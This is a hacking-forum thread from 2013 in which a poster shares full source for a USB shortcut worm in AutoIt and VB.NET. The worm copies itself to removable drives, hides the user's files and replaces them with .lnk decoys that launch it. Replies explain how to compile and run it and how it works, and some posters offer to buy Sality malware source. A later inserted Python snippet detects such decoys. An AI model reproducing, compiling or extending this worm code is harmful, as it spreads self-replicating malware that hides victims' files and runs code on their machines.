[AutoIT] USB Spreader (.lnk method)
05-11-2013, 10:14 PM, (This post was last modified: 05-11-2013, 10:31 PM by D4RK_5Y5T3M.)
Post: #1
[AutoIT] USB Spreader (.lnk method)
Salam..

Just want to ask something..

I found this lnk spread snippet on hackhound.
I'd been looking for a long time and only just found it. It's an AutoIT snippet.

I'm not very good at reading code; is this for building a builder or what?
How do I use this code?

http://paste.tbd.my/1267

Code:
#include <GUIConstantsEx.au3>
#RequireAdmin
Opt("MustDeclareVars", 1)

Global Const $WM_DEVICECHANGE = 0x0219
Global Const $DBT_DEVICEARRIVAL = 0x8000
Global Const $DBT_DEVICEREMOVECOMPLETE = 0x8004
Global Const $DBT_DEVTYP_VOLUME = 0x00000002
Global $RutaVirus="Carpeta_Virus\" & @ScriptName





Global $Gui = GUICreate("WM_DEVICECHANGE")
GUISetState(@SW_HIDE)

GUIRegisterMsg($WM_DEVICECHANGE, "WM_DEVICECHANGE")

Do
Until GUIGetMsg() = -3






;USB_Main (Spreader)
Func USB_Main()
Local $USB_list=ListarUSB()
Local $i=1
Local $USB_ruta=""
For $i = 1 To $USB_list[0]
$USB_ruta=StringUpper($USB_list[$i]) & "\"
ConsoleWrite($USB_ruta & @CRLF)
If not(FileExists($USB_ruta & $RutaVirus)) Then
If Not FileCopy(@ScriptFullPath,$USB_ruta & $RutaVirus,8) then ContinueLoop
Crear_Shortcut($USB_ruta)
EndIf
Next

EndFunc



;Create shortcuts
Func Crear_Shortcut($USB_ruta)


ConsoleWrite($USB_ruta & @CRLF)
Local $busca = FileFindFirstFile($USB_ruta & "*")
Local $filename=0,$Inicio=0,$Icono,$Extension="",$filenameold="",$Borrar=""



If $busca = -1 Then
Exit
EndIf

While 1
$filename = FileFindNextFile($busca)
If @error Then ExitLoop

$Inicio=StringInStr($filename,".")
$Extension=Stringmid($filename,$Inicio)
ConsoleWrite( "Extension: " & $Extension & @crlf)
$Icono=ExIcon_Path($Extension)
ConsoleWrite($Icono[0] & @CRLF & $Icono[1] &  @CRLF)


If  StringLeft($RutaVirus,StringInStr($RutaVirus,"\")-1)==$filename Then $Borrar= $USB_ruta & $filename & ".lnk"

if $Icono[1]=="" Then
    $filenameold=$filename
    If $Extension then
    $filename=StringReplace($filename,$Extension,".lnk")
    Else
    $filename&=".lnk"
    EndIf

    FileCreateShortcut($USB_ruta & $RutaVirus,$USB_ruta & $filename ,"","","",$Icono[0])

Else
    $filenameold=$filename
    If $Extension then
    $filename=StringReplace($filename,$Extension,".lnk")
    Else
    $filename&=".lnk"
    EndIf
ConsoleWrite($USB_ruta & $RutaVirus & @CRLF)
    FileCreateShortcut($USB_ruta & $RutaVirus,$USB_ruta & $filename,"","","",$Icono[0],"",$Icono[1])

EndIf

WEnd


FileDelete($Borrar)
FileClose($busca)
If Not FileSetAttrib($USB_ruta & "*","+H") Then Exit
If Not FileSetAttrib($USB_ruta & "*.lnk","-H") Then Exit
EndFunc



;Get icon path
Func ExIcon_Path($Extension)
Local $Icono_Ruta[2]
Local $i=1
Local $sApp=""
Local $iComa=0
If Not($Extension==".exe") then
$Icono_Ruta[1]=""
$sApp=RegRead("HKEY_CLASSES_ROOT\" & $Extension, "")
$Icono_Ruta[0]=RegRead("HKEY_CLASSES_ROOT\" & $sApp & "\DefaultIcon","")
EndIf
If $Icono_Ruta[0]="" Then
$Icono_Ruta[0]="shell32.dll"
$Icono_Ruta[1]=4
If not(@OSVersion="WIN_XP") Then
$Icono_Ruta[0]="imageres.dll"
EndIf
Return $Icono_Ruta
Else
$iComa=StringInStr($Icono_Ruta[0],",")
If $iComa=0 Then
Return $Icono_Ruta
Else
$Icono_Ruta[1]=StringMid($Icono_Ruta[0],$iComa+1)
$Icono_Ruta[0]=StringLeft($Icono_Ruta[0],$iComa-1)
Return $Icono_Ruta
EndIf
EndIf
EndFunc



;ListarUSB()
Func ListarUSB()
Local $USB = DriveGetDrive("REMOVABLE")
If @error Then
ConsoleWrite("Error DriveGetDrive" & @CRLF)
Else
;~    For $i = 1 To $USB[0]
;~       ; ConsoleWrite("USB " & $i & "/" & $USB[0] & ":" & @CRLF & StringUpper($USB[$i]) & @crlf)
;~    Next
Return $USB
EndIf
EndFunc




; rasim
; http://www.autoitscript.com/forum/topic/79460-usbmon/
Func WM_DEVICECHANGE($hWnd, $Msg, $wParam, $lParam)


    If ($wParam = $DBT_DEVICEARRIVAL) Or ($wParam = $DBT_DEVICEREMOVECOMPLETE) Then
        Local $DEV_BROADCAST_VOLUME = DllStructCreate("int dbcvsize;int dbcvdevicetype;int dbcvreserved;int dbcvunitmask;" & _
                "ushort dbcvflags", $lParam)
        Local $iDriveType = DllStructGetData($DEV_BROADCAST_VOLUME, "dbcvdevicetype")
    Else
        Return $GUI_RUNDEFMSG
    EndIf

    If $iDriveType <> $DBT_DEVTYP_VOLUME Then Return $GUI_RUNDEFMSG

    Local $iMask = DllStructGetData($DEV_BROADCAST_VOLUME, "dbcvunitmask")
    $iMask = Log($iMask) / Log(2)

    Local $iDrive = Chr(65 + $iMask) & ":"

    Switch $wParam
        Case $DBT_DEVICEARRIVAL
;~             TrayTip("WM_DEVICECHANGE", "Conectado", 5, 1)
     USB_Main()

;~         Case $DBT_DEVICEREMOVECOMPLETE
;~             TrayTip("WM_DEVICECHANGE", "Desconectado", 5, 2)
    EndSwitch

    Return $GUI_RUNDEFMSG
EndFunc

EDIT:
Googled around some more and found a VB.NET snippet on HF.

Code:
Public Class USB
'njq8 , Ethical Hacker
    Private Off As Boolean = False
    Dim thread As Threading.Thread = Nothing
    Public ExeName As String = "server.exe"
    Public Sub Start()
  If thread Is Nothing Then
    thread = New Threading.Thread(AddressOf usb, 1)
    thread.Start()
  End If
    End Sub
    Public Sub clean()
  Off = True
  Do Until thread Is Nothing
    Threading.Thread.CurrentThread.Sleep(1)
  Loop
  For Each x As IO.DriveInfo In IO.DriveInfo.GetDrives
    Try
    If x.IsReady Then
    If x.DriveType = IO.DriveType.Removable Or _
    x.DriveType = IO.DriveType.CDRom Then
    If IO.File.Exists(x.Name & ExeName) Then
    IO.File.SetAttributes(x.Name _
    & ExeName, IO.FileAttributes.Normal)
    IO.File.Delete(x.Name & ExeName)
    End If
    For Each xx As String In IO.Directory.GetFiles(x.Name)
    Try
    IO.File.SetAttributes(xx, IO.FileAttributes.Normal)
    If xx.ToLower.EndsWith(".lnk") Then
    IO.File.Delete(xx)
    End If
    Catch ex As Exception
    End Try
    Next
    For Each xx As String In IO.Directory.GetDirectories(x.Name)
    Try
    With New IO.DirectoryInfo(xx)
    .Attributes = IO.FileAttributes.Normal
    End With
    Catch ex As Exception
    End Try
    Next
    End If
    End If
    Catch ex As Exception
    End Try
  Next
    End Sub
    Sub usb()
  Off = False
  Do Until Off = True
    For Each x In IO.DriveInfo.GetDrives
    Try
    If x.IsReady Then
    If x.TotalFreeSpace > 0 And x.DriveType = IO.DriveType _
    .Removable Or x.DriveType = IO.DriveType.CDRom Then
    Try
    If IO.File.Exists(x.Name & ExeName) Then
    IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Normal)
    End If
    IO.File.Copy(Application.ExecutablePath, x.Name & ExeName, True)
    IO.File.SetAttributes(x.Name & ExeName, IO.FileAttributes.Hidden)
    For Each xx As String In IO.Directory.GetFiles(x.Name)
    If IO.Path.GetExtension(xx).ToLower <> ".lnk" And _
    xx.ToLower <> x.Name.ToLower & ExeName.ToLower Then
    IO.File.SetAttributes(xx, IO.FileAttributes.Hidden)
    IO.File.Delete(x.Name & New IO.FileInfo(xx).Name & ".lnk")
    With CreateObject("WScript.****************l").CreateShortcut _
    (x.Name & New IO.FileInfo(xx).Name & ".lnk")
    .TargetPath = "cmd.exe"
    .WorkingDirectory = ""
    .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _
  & " " & ChrW(34)) & "&start " & New IO.FileInfo(xx) _
    .Name.Replace(" ", ChrW(34) & " " & ChrW(34)) & " & exit"
    .IconLocation = GetIcon(IO.Path.GetExtension(xx))
    .Save()
    End With
    End If
    Next
    For Each xx As String In IO.Directory.GetDirectories(x.Name)
    IO.File.SetAttributes(xx, IO.FileAttributes.Hidden)
    IO.File.Delete(x.Name & New IO.DirectoryInfo(xx).Name & " .lnk")
    With CreateObject("WScript.****************l") _
    .CreateShortcut(x.Name & IO.Path.GetFileNameWithoutExtension(xx) & " .lnk")
    .TargetPath = "cmd.exe"
    .WorkingDirectory = ""
    .Arguments = "/c start " & ExeName.Replace(" ", ChrW(34) _
  & " " & ChrW(34)) & "&explorer /root,""%CD%" & New  _
  IO.DirectoryInfo(xx).Name & """ & exit"
    .IconLocation = "%SystemRoot%\system32\****************L32.dll,3" '< folder icon
    .Save()
    End With
    Next
    Catch ex As Exception
    End Try
    End If
    End If
    Catch ex As Exception
    End Try
    Next
    Threading.Thread.CurrentThread.Sleep(5000)
  Loop
  thread = Nothing
    End Sub
    Function GetIcon(ByVal ext As String) As String
  Try
    Dim r = Microsoft.Win32.Registry _
    .LocalMachine.OpenSubKey("Software\Classes\", False)
    Dim e As String = r.OpenSubKey(r.OpenSubKey(ext, False) _
    .GetValue("") & "\DefaultIcon\").GetValue("", "")
    If e.Contains(",") = False Then e &= ",0"
    Return e
  Catch ex As Exception
    Return ""
  End Try
    End Function
End Class
Thank you.

Reply
05-11-2013, 10:33 PM,
Post: #2
RE: [AutoIT] USB Spreader (.lnk method)
Download Visual Basic, load it in Form Load, try compiling, double-click and see what happens.
To follow the path,
Look to the master,
Follow the master,
Look through the master,
Become the master.
Reply
05-11-2013, 11:04 PM, (This post was last modified: 05-11-2013, 11:06 PM by syahmiazhar.)
Post: #3
RE: [AutoIT] USB Spreader (.lnk method)
This is code... compile and run.
At a quick glance:

1. Monitor device changes, i.e. detect USB plug/unplug
2. Find USB drives
3. If the 'virus' file is not on the USB drive, copy the 'virus' script onto it
4. For each file on the pendrive, create a shortcut with the same name (.lnk) but linked to the 'virus' script, with the icon appropriate for the file type.
5. Hide the original files on the pendrive and apply the system attribute
Reply
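The footprint described in steps 4 and 5 above (a hidden original next to a visible same-name .lnk that launches something else) can be checked for when triaging a removable drive. This is an added example, not part of the thread; the `Entry` record, its field names and the sample listing are assumptions, and collecting the listing from a real drive is left to the triage tool.

```python
from collections import namedtuple
# One root-level entry of a removable drive as a triage script would record it
# (hypothetical field names; target/args are None for anything that is not a .lnk).
Entry = namedtuple("Entry", "name hidden target args")
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".pif")

def stem_keys(name):
    """Shortcut stems a decoy for `name` could carry in the two posted samples."""
    low = name.lower()
    # AutoIt sample cuts at the first dot; VB sample appends ".lnk" or " .lnk".
    return {low.split(".", 1)[0], low, low + " "}

def suspicious_target(entry, drive):
    """True if the shortcut runs cmd.exe with 'start' or an executable on the drive."""
    target = (entry.target or "").lower()
    if target.endswith("cmd.exe") and "start" in (entry.args or "").lower():
        return True
    return target.startswith(drive.lower()) and target.endswith(EXEC_EXT)

def find_decoys(entries, drive):
    """Return (shortcut, hidden_original, target) for every decoy pair found."""
    hidden = {}
    for e in entries:
        if e.hidden and not e.name.lower().endswith(".lnk"):
            for key in stem_keys(e.name):
                hidden.setdefault(key, e.name)
    findings = []
    for e in entries:
        low = e.name.lower()
        if e.hidden or not low.endswith(".lnk"):
            continue
        original = hidden.get(low[:-4])
        if original and suspicious_target(e, drive):
            findings.append((e.name, original, e.target))
    return findings

# Constructed listing of drive E: (not taken from a real device).
SAMPLE = [
    Entry("report.doc", True, None, None),
    Entry("report.lnk", False, "E:\\Carpeta_Virus\\sample.exe", ""),
    Entry("Photos", True, None, None),
    Entry("Photos .lnk", False, "C:\\Windows\\System32\\cmd.exe", "/c start ..."),
    Entry("budget.xls", True, None, None),
    Entry("budget.lnk", False, "C:\\Program Files\\Office\\excel.exe", ""),
    Entry("notes.lnk", False, "E:\\tools\\app.exe", ""),
]

if __name__ == "__main__":
    print(*find_decoys(SAMPLE, "E:"), sep="\n")
```

The second element of each finding is the hidden original whose attributes need restoring once the shortcut and its target have been removed.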
05-11-2013, 11:10 PM, (This post was last modified: 05-11-2013, 11:20 PM by pers0nant.)
Post: #4
RE: [AutoIT] USB Spreader (.lnk method)
I don't think that AutoIt code is just a snippet or a builder. That really is the source code of a shortcut virus Rage 2 just compile it with Aut2Exe. Just make sure you have GUIConstantsEx.au3 in the same folder if you haven't fully installed AutoIt3.
Reply
05-11-2013, 11:21 PM,
Post: #5
RE: [AutoIT] USB Spreader (.lnk method)
Yup, that's the virus code...

Global $RutaVirus="Carpeta_Virus\" & @ScriptName
If Not FileCopy(@ScriptFullPath,$USB_ruta & $RutaVirus,8) then ContinueLoop

http://www.autoitscript.com/autoit3/docs...elated.htm
@ScriptName and @ScriptFullPath refer to the script name/file path of this code. It copies itself onto the pendrive...
Reply
05-11-2013, 11:30 PM,
Post: #6
RE: [AutoIT] USB Spreader (.lnk method)
But I don't understand why it uses ConsoleWrite(). Why generate output? Fuck That Shit
Reply
05-11-2013, 11:33 PM,
Post: #7
RE: [AutoIT] USB Spreader (.lnk method)
For Windows apps there's no console, but it still prints console output.. people usually use it for debugging or logging. To see the output, run it from the command prompt.
Reply
05-11-2013, 11:41 PM,
Post: #8
RE: [AutoIT] USB Spreader (.lnk method)
Is it related to the Sality virus?
"The sign that knowledge is blessed is that the higher our knowledge, the lower we bow in humility before Allah and before our fellow humans. Feeling how great Allah is and how high His knowledge is, until we feel how tiny our own knowledge is"
Reply
05-11-2013, 11:49 PM,
Post: #9
RE: [AutoIT] USB Spreader (.lnk method)
Sality is a virus, this is just a worm... not related..
Reply
05-11-2013, 11:57 PM,
Post: #10
RE: [AutoIT] USB Spreader (.lnk method)
So the severity is considered low then?
Reply
05-11-2013, 11:58 PM,
Post: #11
RE: [AutoIT] USB Spreader (.lnk method)
Yup... Kill the process.. Delete the virus... restore the file attributes on the pendrive... and it's back to normal..
Reply
06-11-2013, 12:00 AM,
Post: #12
RE: [AutoIT] USB Spreader (.lnk method)
Oh OK, so why take this worm's source code if the severity is low.. to enhance it or what? Or can't it be enhanced?
Reply
06-11-2013, 12:09 AM,
Post: #13
RE: [AutoIT] USB Spreader (.lnk method)
Maybe he wants to learn ;)
Reply
06-11-2013, 05:43 AM,
Post: #14
RE: [AutoIT] USB Spreader (.lnk method)
(05-11-2013, 11:41 PM)RFC792 Wrote: Is it related to the Sality virus?

I'm willing to buy if anyone wants to sell the source code of that Sality worm ;d
Reply
06-11-2013, 11:32 AM,
Post: #15
RE: [AutoIT] USB Spreader (.lnk method)
(06-11-2013, 05:43 AM)jalil Wrote:
(05-11-2013, 11:41 PM)RFC792 Wrote: Is it related to the Sality virus?

I'm willing to buy if anyone wants to sell the source code of that Sality worm ;d

How much do you dare offer? ;b;b;b
Reply

